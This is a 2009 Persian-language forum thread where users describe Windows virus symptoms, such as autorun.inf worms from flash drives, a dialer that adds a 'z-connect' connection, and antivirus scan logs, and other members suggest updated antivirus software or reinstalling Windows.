جالب اينجاست كه هارد را پارتيشن بندي كردم و ويندوز جديد نصب كردم كه اين ويروس بوده و بعضي مواقع باعث كندي سيستم و هنگ كردن آن مي شود. بطوري كه حتي مواقعي كه كامپيوتر روشن ميكنم و logon ميشه در همون ابتدا بدون هيچ كاري هنگ كرده!!!!!

سلام

عزیز مگه شما آنتی بنصبید؟!

اگه میتوانید Avira بنصبید.

اگر هم نتونستید انتی بنصبید یه تاپیک براش بزنید.

موفق باشید.

عجب شماره پست خطر ناکی دارم.

پست ها: 666

cnn
10-06-2009, 21:44
ویروس autorun.inf به همراه فایلی به اسم q9.cmd به صورت هیدن تو کامپیوترم اومده، چطور از شرش خلاص شم؟

omid 2000
11-06-2009, 13:09
[quote=mahdi7610;2105117]shadi_h جان سلام

از شما بابت ارئه راه های مفید و سازنده برای پاک کردن ویروس های رایج تشکر می کنم.
:11:

arash_7
11-06-2009, 16:38
سي دس درايو من خودش مياد بيرون وقتي هك كه ميديش تو باز مياد بيرون ان ويروسه؟

Ghaioom
11-06-2009, 19:09
ویروس autorun.inf به همراه فایلی به اسم q9.cmd به صورت هیدن تو کامپیوترم اومده، چطور از شرش خلاص شم؟
سلام
اگه انتی ویروس بروز داری مثلاً NOD32 با آخرین آپدیت شاید پاک بشه.
یا دستی تو کامپیوتر سرچ کن و پاکش کن
یا از این نرم افزار استفاده کن.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باشی.

cnn
11-06-2009, 19:41
سلام
اگه انتی ویروس بروز داری مثلاً NOD32 با آخرین آپدیت شاید پاک بشه.
یا دستی تو کامپیوتر سرچ کن و پاکش کن
یا از این نرم افزار استفاده کن.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باشی.

سلام
به هیچکدوم از انتی ویروسها پاک نشد، NOD,NORTON,AVAST,KASPER رو امتحان کردم نشد.
از طریق RUN و SAFE MODE هم نشد چون هم هیدن بود و هم پیدا نمیشد به هیچ وجه و فقط می تونستم از طریق نرو اون رو ببینم
ولی به طور اتفاقی آنتی ویروس avg رو امتحان کردم و پاکش کرد.
ممنون از راهنماییتون
همیشه سلامت باشید:11:

ushuaia
15-06-2009, 00:00
سلام .....استاد سیتم من نمی دونم ویروس است یا نه یا اخطار است ...در هر صورت مشکلی دارد وقتی بر روی درایو ها به جز درایو c راست کلید می کنم یک لحظه علامت سیاهی می اید و قطع می شود و open درایو باز نمی کند و در زیز گزینه open این جمله را نوشته است protected open by nod 32 و وقتی بر روی این نیز کلیک می کنم داریو با اخطار مواجه می شود و باز نمی شود .........استاد من سیستم را از هبیدن در اوردم و در هیدن اخطاری بود که مستطیل بود در زیز جمله بالا را نوشته بود ان را پاک کردم و حال وقتی بر روی open کلیک می کنم این جمله را می نویسد Access is denied است و در پشت ان علامت اخطار است استاد خواهش می کنم راهنمایی کنید ..........ممنون

ushuaia
15-06-2009, 00:08
سلام استاد ....سوالی دیگر دارم در قسمت windows task manager هر موقع ویندوز را عوض می کنم در صد سی پی یو بین 80 و 90 است در این قسمت ....و از این جدول که باز می شود به گزینه پروسس می روم 2 گزینه در صد انها بین 50 و 60 است و وقتی می خواهم end پروسس را بزنم در صد پایین نمی اید و همان گونه است .....این دو گزینه به نام های csrss.exe و rekn .exe یا rken.exe است ایا در سیتم من ویروس است .............ممنون می شوم راهنمایی کنید..................مرسی

jenayaat
17-06-2009, 18:27
سلام
من تا الان اینجوری ویروسی نشده بودم
این ویروس چند تا فایل میسازه
1- SOUNDMAN.exe
در C:\WINDOWS\system32\dllcache
2-netlos و netloss
در C:\WINDOWS\system32\
چند تا فایل دیگه هم هست
این ویروس رو کاسپر میشناسه ولی بعضی وقتا
نود32 میشناسه
نورتون میشناسه
اینا این ویروس و پاک میکنن ولی بازم میاد
یه فایل دیگه هم هست rmote.exe که اینم C:\WINDOWS\system32\ اینجاست
اینا پاک میشن ولی بازم میان (من mbm , kis ,nod32,norton 360)
اینارو فول اپدیت دارم ولی بازم هیچی

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

keyvan1985
20-06-2009, 15:04
من ویندوز جدید نصب کردم رفتم تیک show hidden files زدم ولی هیچ فایل hidden رونشون نداد و به حالت اول برگشت یعنی به این زودی ویروس افتاده ؟
آنتی ویروس به روز nod دارم

Kurosh
20-06-2009, 19:22
سلام ، خسته نباشید همگی دوستان...مخصوصا" مهدی عزیز که مرجع فوق العاده ای رو ایجاد کرده...
اما سرچ که کردم دیدیم از ویروس AhnRpta.exe چیزی پیدا نشد...اگه مطلبی در این باره گذاشته شده ، لینکشو لطف کنین ، اگه نه یه روش عملی واسش پیشنهاد بدین...

من خودم تو yahoo answer جوابشو گرفتم ، اما جالب بود که عملیاتی که اون جا پیشنهاد دادن ، همه ی ویروسای کامپیوتر منو از بین برد ، الا همین ویروس!
اگه دوست داشتین یه بررسیش کنین:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

ali_3001
21-06-2009, 17:51
با سلام خدمت همه بروبچ p30 world

مشکلي برام پيش اومده که مجبور شدم بعد از چند وقت دوري از اينترنت و انجمن دوباره مزاحمتون بشم
چند وقت پيش يه هارد اکسترنال 320g - maxtor خريدم که تقريبا يه هفته اس که باهاش مشکل دارم
وقتي به کامپيو ترم وصلش ميکنم پيغام عجيب غريبي مياد که هر چه کردم ازش سر در نياوردم ولی دست وپا شکسته که معنيش کردم مي گفت که ويندوز نمي تونه روي هارد اکسترنال شما چيزي بنويسه
از اون طرف وقتي پوشه هايي که توي اون هارد ساختم رو باز ميکنم خالي نشون ميده ول وقتي هاردم رو به کامپيوتر يکي از
دوستام وصل ميکنم همه چيز درسته
اولا من از اسمارت سکوريتي 4 نود استفاده ميکنم
آبديت شده است
تمام سيستم رو هم دو بار اسکن کردم چيزي پيدا نکرد که نکرد
ويندوز رو هم عوض کردم تا قبل از اينکه به اينترنت وصل بشم خوب بود ولي بعدش دوباره همون پيغام رو داد
تو رو خدا اگه کسي ميتونه بهم کمک کنه چون روي هاردم اطلاعاتي دارم که اگه پاک بشه بيچاره ميشم.

محمد88
21-06-2009, 19:06
ببخشید من یه تاپیک زدم ولی جوابی نگرفتم...گفتم بیام اینجا شاید جواب گرفتم :
یه ویروسی گرفتم که پس از چند دقیقه روشن بودن کامپیوتر این اتفاقا میفتن :
از اینترنت میپره بیرون ;
هیچ گونه فایل صوتی باز نمیشه ;
دیگه به اینترنت وصل نمیشه ;
کلا هیچ کاری نمیشه کرد و فقط باید خاموش روشن یا ریستارت کنم...

picher_s
22-06-2009, 12:53
ببخشید من یه تاپیک زدم ولی جوابی نگرفتم...گفتم بیام اینجا شاید جواب گرفتم :
یه ویروسی گرفتم که پس از چند دقیقه روشن بودن کامپیوتر این اتفاقا میفتن :
از اینترنت میپره بیرون ;
هیچ گونه فایل صوتی باز نمیشه ;
دیگه به اینترنت وصل نمیشه ;
کلا هیچ کاری نمیشه کرد و فقط باید خاموش روشن یا ریستارت کنم...


ببخشید من یه تاپیک زدم ولی جوابی نگرفتم...گفتم بیام اینجا شاید جواب گرفتم :
یه ویروسی گرفتم که پس از چند دقیقه روشن بودن کامپیوتر این اتفاقا میفتن :
از اینترنت میپره بیرون ;
هیچ گونه فایل صوتی باز نمیشه ;
دیگه به اینترنت وصل نمیشه ;
کلا هیچ کاری نمیشه کرد و فقط باید خاموش روشن یا ریستارت کنم...

سلام

مگه آنتی ویروس رو سیستمت نداری؟!

اسمش رو هم نمیدونی؟



رو اجرا کن و logَش رو اینجا بزار.

موفق باشید.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

Arashpc
22-06-2009, 21:02
سوالی از محضر دوستان داشتم اینه که آنتی ویروس من به spoolsv گیر میده و میگه ویروس هست مشکوک هم میزنه ولی نمیتونه پاکش کنه و انگار باید دستی پاک بشه سرچ کردم رو درایو C نتیجه زیر بدست اومد

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با آنتی ویروس روی هر دوش اسکن انجام دادم اولی رو ویروس تشخیص داد ولی دومی پاک بود ولی اینم بگم نمیتونه پاک کنه

آنتی ویروس من ESET smart security nod 32 ver 4.417 نسخه بزینس با آخرین آپدیت بروز

البته نمیدونم جدیدا نود 32 خیلی گیر میده از جمله نیز فایلی به اسم RASAUTOU.EXE رو هم از مسیر سیستم 32 پاک کرد

همچنین ویروس services.exe رو هم پیدا کرد ولی نمیتونست پاک کنه با توجه به پست صفحه اول تونستم پاکش کنم در ضمن از وقتی که این ویروس رو پاک کردم به چند تا سایت که قبلا ارور میداد و PAGE باز نمیشد به راحتی برام باز میشن البته این ویروس رو به کمک نود پاک کردم همین که اون رو از تسک منیجر غیر فعال کردم با اون فایل bache نود خودش بقیه کار ها رو ردیف کرد

لطفا راهنمایم کنید :11:

ali_disslove
26-06-2009, 01:11
آقا من 1 هفته نيست كه اين سيستمم رو گرفتم وقتي روي درايوها كليك ميكنم 1 ثانيه طول ميكشه

5 بار ويندوز عوض كردم-پارتيشن بندي كردم البته با حفظ اطلاعاتم-بنچمارك از هاردم رفتم كه عالي بود

هيچ راهي نيست كه پيشنهاد نداده باشند و انجام نداده باشم

گفتند ويروس داره كامپيوترم البته ايتن اضافه كنم كه 3 براره سيستمه قبليم كه ماله 6 ساله پيش بود طول ميكشه تا xp بياد بالا و اينكه ديرو الكي الكي ويندوزه سونم پريد

و اينكه بعضي از فايل هاي زيپم باز نميشه اما قبلا باز ميشد

آنتي nod32 ورژن 3 رو ريختم همين الانم آپديت كردم 20 مگ بود اونم با دايل آپ 2 ساعت طول كشيداما ميگه هيچ ويروسي نيست اما توي log كه ميري هزاران فايل رو نوشته كه ميگه آسيب ديده-باز نميشه-روش رمز گذاشته شده و ......

بعضيا رو با آبي نوشته بعضيا رو با مشكي

دارم ديوونه ميشم نميدونم چه خاكي به سرم بريزم

در ضمن آنتي ها كسپر-نورتون -مكافي هم هيچ ويروسي رو شناسايي نكردند

logesh خيليييي طولانيههه من چند تاشو ميزارم


C:\pagefile.sys - error opening
C:\Documents and Settings\ali\NTUSER.DAT - error opening
C:\Documents and Settings\ali\ntuser.dat.LOG - error opening
C:\Documents and Settings\ali\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat - error opening
C:\Documents and Settings\ali\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG - error opening
C:\Documents and Settings\ali\Local Settings\Temp\NIS15.5\Support\LUpdate\WLUEX\0c01\E ULA.txt » MIME - is OK (internal scanning not performed)
C:\Documents and Settings\ali\Local Settings\Temp\NIS15.5\Support\LUpdate\WLUEX\1001\E ULA.txt » MIME - is OK (internal scanning not performed)
C:\Documents and Settings\ali\My Documents\» تاپیـــک اختصاصـــــی Eset NOD32 - -----------.mht » MIME - is OK (internal scanning not performed)
C:\Documents and Settings\All Users\Application Data\ESET\ESET NOD32 Antivirus\Charon\CACHE.NDB - error opening
C:\Documents and Settings\LocalService\NTUSER.DAT - error opening
C:\Documents and Settings\LocalService\ntuser.dat.LOG - error opening
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat - error opening
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG - error opening
C:\Documents and Settings\NetworkService\NTUSER.DAT - error opening
C:\Documents and Settings\NetworkService\ntuser.dat.LOG - error opening
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat - error opening
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG - error opening
C:\WINDOWS\SoftwareDistribution\EventCache\{0144DA FE-9B2E-4383-BE5E-F2B9FB259BDC}.bin - error opening
C:\WINDOWS\system32\CatRoot2\edb.log - error opening
C:\WINDOWS\system32\CatRoot2\tmp.edb - error opening
C:\WINDOWS\system32\config\default - error opening
C:\WINDOWS\system32\config\default.LOG - error opening
C:\WINDOWS\system32\config\SAM - error opening
C:\WINDOWS\system32\config\SAM.LOG - error opening
C:\WINDOWS\system32\config\SECURITY - error opening
C:\WINDOWS\system32\config\SECURITY.LOG - error opening
C:\WINDOWS\system32\config\software - error opening
C:\WINDOWS\system32\config\software.LOG - error opening
C:\WINDOWS\system32\config\system - error opening
C:\WINDOWS\system32\config\system.LOG - error opening
D:\hiberfil.sys - error opening
D:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\97 0c1c0d3abfdaf93487992c23a3f654_497ddd56-41d7-4f98-804a-d3214449473d - error opening
D:\Users\علی\AppData\Local\Temp\RarSFX1\setup.c dd » ZIP » _detect.dat - error - password-protected file
D:\Users\علی\AppData\Local\Temp\RarSFX1\setup.c dd » ZIP » _proj.dat - error - password-protected file
D:\Users\علی\AppData\Local\Temp\RarSFX1\setup.c dd » ZIP » _fonts.dat - error - password-protected file
D:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\chrome.manifes t » MIME - is OK (internal scanning not performed)
D:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\MicrosoftDotNe tFrameworkAssistant.xpi » ZIP » chrome.manifest » MIME - is OK (internal scanning not performed)
D:\Windows\winsxs\x86_netfx35wpf-chrome_manifest_31bf3856ad364e35_6.1.7100.0_none_d 8c3a3aee8d1488f\chrome.manifest » MIME - is OK (internal scanning not performed)
D:\Windows\winsxs\x86_netfx35wpf-microsof..meworkassistant_xpi_31bf3856ad364e35_6.1 .7100.0_none_431b85f651729067\MicrosoftDotNetFrame workAssistant.xpi » ZIP » chrome.manifest » MIME - is OK (internal scanning not performed)




C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat - error opening

G:\darksector\Cache.Windows\H.Scene.cache » ZIP » Levels/Mission06/EncounterInfestedFirstFloor/M6WorldGeometry_lyr.scene.1 - error - unknown compression method

ali_disslove
26-06-2009, 01:26
الان 1:15 شب هست من 8 ساعته كه فقط ميخوام اين موردو درستش كنم اما ن م ي شه
حالا هم كه ميخوام ويندوزه سون كه پريده رو فايل هاي اضافيش رو پاك كنم ميگه
sbdrom

bfsvc پك نميشه

حتي فرمت هم نميشه ميگه windows can not format this drive-quit any disk utilities or other program that are using drive, and make sure that no window is displaying the contents of the drive then try formating again

من الان توي xp هستم كه درايو c هست و ميخوام d رو كه سون توش بوده فرمت كنم فكر نكنم بايد همچين اروري بده-پس چه جوري فرمتش كنم اين سون رو--عجب بدبختي گير افتاديما

ali_disslove
26-06-2009, 19:01
توروخدا يكي كمك كنه يعني هيچ كس نميدونه اين چه ويروسيه ؟؟؟؟اصلا ويروسه؟

ali_disslove
27-06-2009, 12:38
بعده 4 روز كسي نيست جواب بده ؟؟؟؟

feefy
28-06-2009, 17:46
سلام ... نمیدونم کسی همچین ویروسی داشته یا نه
autorun دارم که هیچ با هیچ آنتی ویروسی هم پاک نشد
بعد یه چی دیگه هم هست یه اسم hyetn1i ...
کلافه شدم ... بگین چجور پاکش کنم ...
الان kaspersky دارم.. با Nod نشد پاک کنم
kasper پیداش میکنه اما بازم تو سیستم میمونه . درایوام اجرا نمیشه .. فایلای مخفیو نشون نمیده
کمک کنین
کلی از کارام رو سیستمه
چی کار کنم .....

shiningphoenix
02-07-2009, 11:20
سلام.چجوری میشه فهمید فایلهای قابل دانلود روی اینترنت ویروسی هستن یا نه؟و اگر فایل یا برنامه ویروسی از نت دریافت بشه ممکنه بدون کلیک کردن هم ویروس فعال بشه؟

mz7
02-07-2009, 14:04
عرض ادب و احترام و سلام . از راهنمایی ها و زحمات شما ممنونم
چند وقتی است که به ویروسی مبتلا گشتم که امانم را بریده
(به قول شاعر به دریایی در اوفتادم که پایانش نمیبینم به دردی مبتلا گشتم که درمانش نمیبینم)البته پیش پیش از تکراری بودن سوال عذر خواهی میکنم!

این ویروس یا کرم یا تروجان یا باکتری یا انگل یا کنه یا..... از طریق اتصال یک فلش به کامپیوتر وارد شده ومشکلات زیر را به وجود اورده
1- اول اینکه اجازه نصب انتی ویروس را نمیدهد( با کلی زحمت انتی ویروس به روز کسپر و nod32 با ایترنت dialup از سایت های مختلف دانلود کردم اما بعد از نصب کردن اجازه باز شدن واستفاده از انها را نمیداد)و همچنین اجازه نصب بعضی از برنامه ها را نمیدهد (مثل برنامه های پاک سازی رجیستری)
2- دوم اینکه یک نوار زرد رنگ شامل جملات مختلف در بالا صفحه ایجاد میکند(البته نمیدونم این طرف ضد دینه یا ضد حکومت یا ضد ایران یا.... اصلا معلوم نیست شرقی یاغربی .... از قرون وسطی تا زمان حال با همه مشکل داره ... از انگلیسی .و امریکایی و اسراییلی گرفته تا ایرانی) به هر حال این ویروس دو تا فایل که یکی از انها به نامharf است و توسط اینترنت اکسپلورر باز میشود که شامل تمام این شعار ها میباشد ودیگری یک عکس از اقای احمدی نژاد است که با خاخامها دست داده است با نام yahood به وجود اورده است (یکی درMy Documents و دیگری در دسکتاپ که با هر بار پاک کردن انها دوباره بر میگردند)
3- سوم اینکه این ویروس فایل هایی با نام های Autorun و autoply و پوشه یی به نام RECYCLER در تمام درایو ها به صورت مخفی بوجود اوردند که البته با راهنمایی دوستان انها را از حالت مخفی خارج کردم( البته این نکته را بگم که در صفحات اولیه این تاپیک در مورد ویروس هایی که Autorun ایجاد میکنند صحبت شده بود اما در مورد از بین بردن انها در بعضی موراد نیاز به انتی ویروس بود که همان طور که گفتم نمیتوانم انتی نصب کنم)
4- چهارم اینکهfolder option وجود ندارد البته با راهنمایی دوستان یه بار اون را برگردوندم اما دوباره نیست (البته رجستری و task manager سر جاشون قرار دارند!)
5- پنجم اینکه بعضی از برنامه ها امکان دسترسی بهشون نیست (مثلWindows Media Player و یا برنامه Babylon ) البته نمیدونم مربوط به ویروس هست یا نه اما میدونم که بعد از ویروسی شدن این اتفاق افتاد( این نکته هم بگم که متن هایی که با word و exel نوشتم توسط هیچ کدام از این دو برنامه باز نمیشود)
6- البته میدانم که بسیار درباره این نوع ویروس ها صحبت کرده اید اما یک راهنمایی کامل و مطمئن میخواهم و خواهشمندم به زبان کاملا ساده و مفصل (زیر اول ابتدایی ) باشد چون یه خورده تازه کارم
7- در اخر از کلیه دوستان یاران دلنوازان دلبران مهربانان مهر افروزان و عزیزان وتمیزان تقاضا داریم این بنده درمانده را یاری کنند

و من الله توفیق اجرکم عند الله پیش پیش سپاس بی شمار اینجانب را پذیرا باشید دوستدار شما یکی از دوستان شما (ولی عجب نامه ایی شد):11:

alenkita
03-07-2009, 06:46
مشکل خیلی عجیب در سیستم

با سلام
من وقتی که با خط dialup به اینترنت وصل میشم، پس از چند دقیقه خط خود به خود قطع میشه و سیستم شروع به شماره گیری میکنه. داخل Network Connections که میرم، میبینم یه کانکشن به نام z-connect با شماره اتصال ساخته شده . اگه پاکشم هم کنم ، فرقی نمیکنه و دوباره با اتصال به نت همین موضوع تکرار میشه.
میشه بگید چطور میتونم این مشکل رو رفع کنم ؟
ضمنا از آنتی ویروس nod32 ورژن 4.0.437 استفاده میکنم.

ashe
03-07-2009, 18:02
سلام
کامپیوترم ویروسی شده...
حواسم نبود رو درایو فلش مموری دابل کلیک کردم حالا با هر با کلیک رو درایوا پنجره جداگانه باز میشه:
1-فولدر آپشن هستش ولی unhide نمیشه چه سیستمی چه غیر سیستمی ...
task manger-2 از بین نرفته ...
3-یاهو از کار افتاده...
4-هر چند دقیقه یه بار یه پنجره cmd باز میشه و مسیر c:/windows/system32/ddr.exe نشون میده...
5-تو همه ی درایوا سه تا فایل به نام autorun.inf iwjj.com NPSWF32.dll به وجود اومده که بصورت فایلهای سیستمی هستش...
6-سیستم شدیدا کند شده
با برنامه ACDSee میشه اون سه تا فایل رو دید ولی پاک نمیشن...اگه میشه یه روش دستی بگید چون امکان اپدیت انتی ویروس نیستش...چند تا از روش های صفحه اول رو انجام دادم ولی نشد
لطفا راهنمایی کنید

japrap
04-07-2009, 14:02
1- آقا من هر كاري مي كنم دوباره autorun.inf ساخته ميشه ( ويندوزم تازه عوض كردم )
2-در ضمن هر كاري هم كه در صفحه اول گفته شد كردم ولي باز هم تيك show hidden files and folders ثابت نمي مونه و باز ميره روي do not show hidden files and folder
من اينو هر بار 1 مي كنم دوباره 0 ميشه :HK LocalMachine\Software\Microsoft\Windows\CurrentVer sion\Explorer\Advanced\Folder\Hidden\SHOWALL(Check edValue)
3- همچنين وقتي ويندوزم شروع به كار ميكنه 2 تا فايل txt با نام هاي desktop به من نشون داده ميشه كه توشون نوشته :
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell 32.dll,-21787
4- همچنين وقتي روي درايو هام كليك مي كنم در يك پنجره ي جديد باز مي شوند( هر كاري هم كردم باز درست نشد)
5- مهمتر از همه اينكه پس از گذشت حدود 15 دقيقه از شروع به كار ويندوز ، ويندوزم هنگ مي كند
خواهشا يكي كمكم كنه

amin11370
04-07-2009, 17:43
1- آقا من هر كاري مي كنم دوباره autorun.inf ساخته ميشه ( ويندوزم تازه عوض كردم )
2-در ضمن هر كاري هم كه در صفحه اول گفته شد كردم ولي باز هم تيك show hidden files and folders ثابت نمي مونه و باز ميره روي do not show hidden files and folder
من اينو هر بار 1 مي كنم دوباره 0 ميشه :HK LocalMachine\Software\Microsoft\Windows\CurrentVer sion\Explorer\Advanced\Folder\Hidden\SHOWALL(Check edValue)
3- همچنين وقتي ويندوزم شروع به كار ميكنه 2 تا فايل txt با نام هاي desktop به من نشون داده ميشه كه توشون نوشته :
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell 32.dll,-21787
4- همچنين وقتي روي درايو هام كليك مي كنم در يك پنجره ي جديد باز مي شوند( هر كاري هم كردم باز درست نشد)
خواهشا يكي كمكم كنه


منم همین مشکلو دارم نمی دونم باید چکار کنم (البته برای من اون 2 تا فایل txt نمی آید) ولی منم هرکار کردم درست نشد
خواهشا هر کی میدونه ما رو راهنمائی کنه ؟؟؟؟؟؟؟؟

alenkita
06-07-2009, 06:57
اینجا کسی نیست جواب بده؟

Sajad2006
06-07-2009, 10:08
مشکل خیلی عجیب در سیستم

با سلام
من وقتی که با خط dialup به اینترنت وصل میشم، پس از چند دقیقه خط خود به خود قطع میشه و سیستم شروع به شماره گیری میکنه. داخل Network Connections که میرم، میبینم یه کانکشن به نام z-connect با شماره اتصال ساخته شده . اگه پاکشم هم کنم ، فرقی نمیکنه و دوباره با اتصال به نت همین موضوع تکرار میشه.
میشه بگید چطور میتونم این مشکل رو رفع کنم ؟

ضمنا از آنتی ویروس nod32 ورژن 4.0.437 استفاده میکنم.

دوست عزیز یعضی سایتها هستند که وقتی واردشون میشی یه ویروس می فرستند که یک Conection درست میکنه که خیلی خطرناکه البته از نظر مالی چون ارتباط بین المللی برقرار می کنه و خداد تومن پول میاد رو قبض سریع ویندوزتو عوض کن و آنتی ویروست رو آپدیت.

Sajad2006
06-07-2009, 10:09
1- آقا من هر كاري مي كنم دوباره autorun.inf ساخته ميشه ( ويندوزم تازه عوض كردم )
2-در ضمن هر كاري هم كه در صفحه اول گفته شد كردم ولي باز هم تيك show hidden files and folders ثابت نمي مونه و باز ميره روي do not show hidden files and folder
من اينو هر بار 1 مي كنم دوباره 0 ميشه :HK LocalMachine\Software\Microsoft\Windows\CurrentVer sion\Explorer\Advanced\Folder\Hidden\SHOWALL(Check edValue)
3- همچنين وقتي ويندوزم شروع به كار ميكنه 2 تا فايل txt با نام هاي desktop به من نشون داده ميشه كه توشون نوشته :
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell 32.dll,-21787
4- همچنين وقتي روي درايو هام كليك مي كنم در يك پنجره ي جديد باز مي شوند( هر كاري هم كردم باز درست نشد)
5- مهمتر از همه اينكه پس از گذشت حدود 15 دقيقه از شروع به كار ويندوز ، ويندوزم هنگ مي كند
خواهشا يكي كمكم كنه

دوست عزیز کارهایی تو پست اول گفته شده انجام بده دقیق مشکلت حل میشه!

Sajad2006
06-07-2009, 10:10
سلام
کامپیوترم ویروسی شده...
حواسم نبود رو درایو فلش مموری دابل کلیک کردم حالا با هر با کلیک رو درایوا پنجره جداگانه باز میشه:
1-فولدر آپشن هستش ولی unhide نمیشه چه سیستمی چه غیر سیستمی ...
task manger-2 از بین نرفته ...
3-یاهو از کار افتاده...
4-هر چند دقیقه یه بار یه پنجره cmd باز میشه و مسیر c:/windows/system32/ddr.exe نشون میده...
5-تو همه ی درایوا سه تا فایل به نام autorun.inf iwjj.com NPSWF32.dll به وجود اومده که بصورت فایلهای سیستمی هستش...
6-سیستم شدیدا کند شده
با برنامه ACDSee میشه اون سه تا فایل رو دید ولی پاک نمیشن...اگه میشه یه روش دستی بگید چون امکان اپدیت انتی ویروس نیستش...چند تا از روش های صفحه اول رو انجام دادم ولی نشد
لطفا راهنمایی کنید
دوست عزیز شما پست اول رو بخون و دقیق انجام بده مشکلت حل میشه!

alimedia20
07-07-2009, 15:51
خيلي عاليهو من تازه عضو اين سايت شدم واقعا كار راه اندازه.ازين تاپيك واقغا استفاده كردم.ممنون

shiningphoenix
10-07-2009, 02:31
سلام.سرعت اینرنت کامپیوتر من کم شده بعضی وقتها ارور سی دی رام میده و آنتی ویروسم(nod32 )هم غیرفعال شده و وقتی روش کلیک میکنم پیغام error communication with kernel رو میده .باید چکار کنم؟

Avalon1
12-07-2009, 23:44
*** عدم رفع ویروس***


با سلام ,
در بوت سکتور کامپیوترم تروجانی به نام Hijacker.Gen رخنه کرده.

این تروجان در این مسیر هم هست: C:\WINDOWS\system32\cdfview32.dll

آنتی ویروس Avira Antivir دارم , اون رو تشخیص میده اما نمیتونه از بین ببره , مینویسه:


Action(s) taken:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\f81f60b6638\DllN ame.
An error has occurred and the file was not deleted. ErrorID: 26003.
The file could not be deleted!
Attempting to perform action using the ARK lib.
The file was moved to '497d9e6a.qua'


بعد از بارها Delete کردن و انتقال به پوشه Quarantine توسط آنتی ویروس , ویروس مذکور باز هم در هردو مکان وجود داره واز بین نمیره.
با سپاس و تشکر.

zombie
13-07-2009, 00:53
آقا یکی کمک کنه.منم این ویروس Autorun.inf گرفتم.
کارایی که پست اول گفت کردم. ولی پاک نشد.
کمک کنید لطفا...

zombie
13-07-2009, 14:04
کسی پست شماره 5 رو تایید می کنه؟یعنی تا الان مشکلی نداشته؟؟

Ghaioom
14-07-2009, 09:52
آقا یکی کمک کنه.منم این ویروس Autorun.inf گرفتم.
کارایی که پست اول گفت کردم. ولی پاک نشد.
کمک کنید لطفا...
سلام
شما از آنتی ویروس بروز استفاده کنید. درست میشه

p30girl
14-07-2009, 10:08
راه حل ويروس z-connection رو هم بگين

shahrzad61
14-07-2009, 10:59
دوست عزیز یعضی سایتها هستند که وقتی واردشون میشی یه ویروس می فرستند که یک Conection درست میکنه که خیلی خطرناکه البته از نظر مالی چون ارتباط بین المللی برقرار می کنه و خداد تومن پول میاد رو قبض سریع ویندوزتو عوض کن و آنتی ویروست رو آپدیت.


من2 بار ويندوزم رو عوض كردم اما دوباره همون مشكل پيش اومد:19:

lordsuperboys
14-07-2009, 12:25
سلام من ویندوزم تازه عوض کردم وویروس autorun.inf را کاملاً پاک کردم اما تنها با نصب فقط یک برنامه مانند فایر فاکس تسک مینجر غیر فعالذ میشود و مرورگرها بعد از 2 دقیقه غیر فعال میشود و ویندوز restore هم کار نمکند و هنگام باز کردن درایو ها درایو را در پنجره ی دیگری باز میکند و show hidden را غیر فعال میکند اقا من چیکار کنم
ویرایش:اقا یه چیز دیگه الان خواستم nod 32 ورژن قدیمی شو نصب کنم دیدم stup برنامه اجرا نشد رو برنامه های دیگه هم امتحان کردم stup شون اجرا نشد
فک کنم این ویروس ما یه چیزی تو مایه های سرطان جزام اینا خیلی لامذهب

saeed774
14-07-2009, 13:22
سلام من ویندوزم تازه عوض کردم وویروس autorun.inf را کاملاً پاک کردم اما تنها با نصب فقط یک برنامه مانند فایر فاکس تسک مینجر غیر فعالذ میشود و مرورگرها بعد از 2 دقیقه غیر فعال میشود و ویندوز restore هم کار نمکند و هنگام باز کردن درایو ها درایو را در پنجره ی دیگری باز میکند و show hidden را غیر فعال میکند اقا من چیکار کنم
ویرایش:اقا یه چیز دیگه الان خواستم nod 32 ورژن قدیمی شو نصب کنم دیدم stup برنامه اجرا نشد رو برنامه های دیگه هم امتحان کردم stup شون اجرا نشد
فک کنم این ویروس ما یه چیزی تو مایه های سرطان جزام اینا خیلی لامذهب

شما برنامه زيرو دان كن و اجرا كن تا فايل هاي Autorun و احتمالا ويروس مربوطه از بين برن و بعد ،از اونجاييكه براتون عوض كردن ويندوز مقدوره يكبار ديگه هم ويندوز بنصبين - سعي كنين درايو C رو با برنامه هاي تحت داس مثه Hirens Boot Cd فرمت كنين يا با سيدي خود ويندوز بصورت فول فرمت كنين - بعد از نصب ويندوز هيچ درايوي رو با دابل كليك باز نكنين و از يك منبع موثق مانند سيدي ، آنتي ويروس معتبري مثه كسپر يا نود يا آويرا يا Avast نصب كنين و آپديت كنين و يكبار فول اسكن كنين .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بيبن آنتي ويروسي كه تو پست زير معرفي كردم در اين حالت فعلي ويندوز نصب ميشه - اگر نصب بشه مطمئنا مشكلت رو حل خواهد كرد .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

zombie
14-07-2009, 14:59
تو همه فولدرهام یه فایلی به اسم Desktop هست.این ویروسه؟چیکارش کنم؟

pooria_k2
16-07-2009, 02:07
